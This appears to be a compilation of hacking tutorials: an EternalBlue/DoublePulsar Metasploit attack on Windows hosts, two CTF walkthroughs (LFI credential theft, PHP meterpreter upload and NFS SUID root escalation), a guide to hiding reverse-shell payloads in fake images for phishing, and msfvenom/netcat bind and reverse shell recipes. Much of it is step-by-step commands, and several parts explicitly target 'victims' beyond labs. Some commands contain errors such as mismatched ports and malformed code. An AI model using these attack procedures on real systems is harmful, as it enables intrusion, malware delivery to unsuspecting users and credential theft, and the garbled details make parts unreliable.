Exploit Remote Windows PC with Eternalblue & Doublepulsar Exploit in Metasploit

Through this article we are sharing recent zero day exploit which requires metasploit framework to shoot any other windows based system. This exploit is combination of two tools “Eternal Blue” which is use as backdooring in windows and “Doublepulsar” which is used for injecting dll file with the help of payload. So we will manually add this exploit in metasploit framework and step up for attacking window server 2008.

Attacker: kali Linux

Target: window 7 and window server 2008

Let’s Start!

Open the terminal in Kali Linux and type following command to download this exploit from git hub.

Git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

Once the required exploit will get downloaded then open the folder and copy Eternal Blue- Doublepulsar .rb ruby file so that we can add this exploit inside metasploit.

Now past the copied ruby file inside given path Usr/share/metasploit Framework /module/exploits/windows/smb which will add this exploit inside metasploit framework.

Then load metasploit framework to start and type following for testing zero day exploit

Msfconsole

This module exploits vulnerability on SMBv1 and SMBv2 protocols through eternalblue. After that doublepulsar is used to inject remotely a malicious dll.

Use windows/smb/eternalblue_doublepulsar

Msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps

Msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps

Msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64

Msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe

Msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6

Msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104

Msf exploit (eternalblue_doublepulsar)>exploit

Hence from screenshot you can observer only we need to set target’s architecture and IP before launching exploit and then when all information is set then launch your attack which will give you meterpreter session successfully like I have owned.

Hack the billu: b0x VM (Boot2root Challenge)

Hi friends! Once again we are here with a new vulnerable lab challenge “Billu Box” .created by Manish Kishan Tanwar  It is very simple and easy especially for beginners to complete the challenges, mainly attacker need to escalate privileges to gain root access. You can download it from here.

Let’s breach!!!

Open the terminal in your Kali Linux scan your network using netdiscover command and hence from scanning result I got target IP 192.168.1.102

Then use nmap aggressive scan for port and protocol enumeration:

Nmap –p- -A 192.168.0.102

So here I found port 22 and 80 are opened for SSH and HTTP respectively.

Since port 80 is open so I explore target IP on browser but here I didn’t get any remarkable result.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “test” directories. So now I will go with test directory.

So when I open test.php file in the browser here I found a message “file parameter is empty please provide file path in file parameter” where file parameter is vulnerable to LFI.

Using hackbar tool which is Firefox plug-in and Taking advantage of LFI vulnerability I try to include index.php in file parameter from file=index.php

So when I open index.php file here I found another file c.php is included.

So again with help of hackbar I look for c.php file from file=c.php for further enumeration so that we can find some clue to exploit the target.

When I read c.php file here I got some information related to connected database and the highlighted text is reflecting like credential for database.

If you remembered the result of dirb tool here it had revealed another directory which is phpmy so therefore I will go with phpmy for further enumeration.

Then again taking advantage LFI I explore config.inc.php from file=/var/www/phpmy/config.inc.php

Last but not least we have finally achieve something very remarkable and in the given screenshot you can read from config.inc.php file I have found server’s login username and password root: toor respectively.

From port enumeration result we have found port 22 is open for ssh therefore I will try root: toor for ssh login. When I use these credential for ssh login successfully I got root access hence the given challenge is completed.

Embedded Backdoor with Image using FakeImageExploiter

In this article we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it.

Let’s start!

Open the terminal inside your kali Linux and type following command to download it from github.

Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.

Now made some changes inside setting file as shown the screenshot:

Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO  and scroll down for next configration.

In same way set these two values also as shown in screenshot then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making certain changes in setting file then open the terminal and run the program file:

Cd FakeImageExploiter

./ FakeImageExploiter.sh

Click on YES to execute framework.

Select payload to build as I had choose window/meterpreter/reverse_tcp for attack.

After then a pop up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.

Now select icon for your malicious image. 

Give a name to your payload which will be display to victim as file name, from screenshot you can see I had given sales.

Now it generates a link as you can observe it from highlighted part of screenshot and then send this link to victim. Now victim will download the zip file and click on the sales.jpg.

When victim will click on sales.jpg, we will get meterpreter session at the background on metasploit framework.

2 ways to use Msfvenom Payload with Netcat

In this article you will learn how we can connect with victim through netcat shell using msfvenom payload. There will be two different ways for hacking any system using msfvenom with netcat.

1^st Method

Firstly open the terminal and type following command for msfvenom which generate an exe payload:

Msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=8956 –f exe > /root/Desktop/root.exe

Then send this root.exe file to victim and open other terminal for netcat shell and type following command:

nc 192.168.0.103 89565

When victim will click on root.exe file attacker will get access of victim’s system.

2^nd Method

Again open the terminal type following command for msfvenom which generate an exe payload:

Msfvenom –p windows/shell_reverse_tcp  lhost=192.168.0.107 lport=888 –f exe > /root/Desktop/1.exe

Then send this 1.exe file to victim and open other terminal for netcat shell and type following command:

nc -lvp 8888

When victim will click on 1.exe file attacker will get reverse connection of victim’s system.

Hack the Orcus CTF Challenge

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article we are sharing our work efforts which we have utilize to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

Let’s Breach!!

192.168.0.151 is the trget ip now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through namp.

nmap -p- -sV 192.168.0.151

From screenshot you can see there are so many open ports but I will go with port 80.

Since port 80 was opened therefore I had explore target IP 192.168.0.151 in the browser but here I didn’t get any remarkable thing.

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:

Dirb http://192.168.0.151

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.

In browser I explored 192.168.0.151/backups as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.

So after unzip when I open it I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in hop to get something related to database.

Finally after making many efforts I found database username and password as dbuser: dbpasswords respectively.

In dirb brute force attack we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above given screenshot. Now again I will move towards browser to explore 192.168.0.1.51/phpmyadmin in URL. Form given below screenshot you can observe I had entered above username and password here.

When you will give correct login credential it will allow you to login inside phpmyadmin page. From screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.

Now inside zenphoto I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.

Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword

Without disturbing other fields click on save which will start database zenphoto installation.

This will start installation when you will click on go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.

Further click on given tab I agree to these terms and condition.

Now type name for new user as admin  and type password: password and confirm password as shown in below image and then click on apply tab given at the top 

Then login into zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.

Most important thing is to start multi handler inside metasploit.

Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following url 192.168.0.151/zenphoto/albums, from given image you can see our shell.php is successfully uploaded now click on it.

When you will click on shell.php you will get meterpreter session inside metasploit. Now type following command in order to catch the flag.

Meterpreter >cd /var/www

Meterpreter >ls

Meterpreter >cat flag.txt

 Congrats! We have caught 1^st flag.

After so many efforts I found a folder kippo then I step towards it for more information.

Meterpreter >pwd

Meterpreter >cd ..

Meterpreter >cat etc/kippo/data/userdb.txt

 Finally! Caught 2^nd flag also.

Now for root privilege escalation open a text document and following: reference

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary

Int main (viod) {

                Setresuid (0, 0, 0,);

                System(“/bin/bash”);

}

Then save it as raj.c on the desktop.

Now upload raj.c file for compiling and gain root access as shown in following image.

Meterpreter >upload/root/Desktop/raj.c

Meterpreter >shell

gcc -o raj raj.c

Since we know from the nmap’s result nfs port was open in targeted IP so taking advantage of it we will mount tmp ‘s data in url Kali Linux. Now create a folder mount data inside it.

mount -t nfs 192.168.0.151:/tmp mount

Chown root: root raj

Chmod u+s raj

./raj

Id

Cd /root

Cat flag.txt

Grate!! We have Caught 3^rd flag also.

Now try yourself to find out one more flag.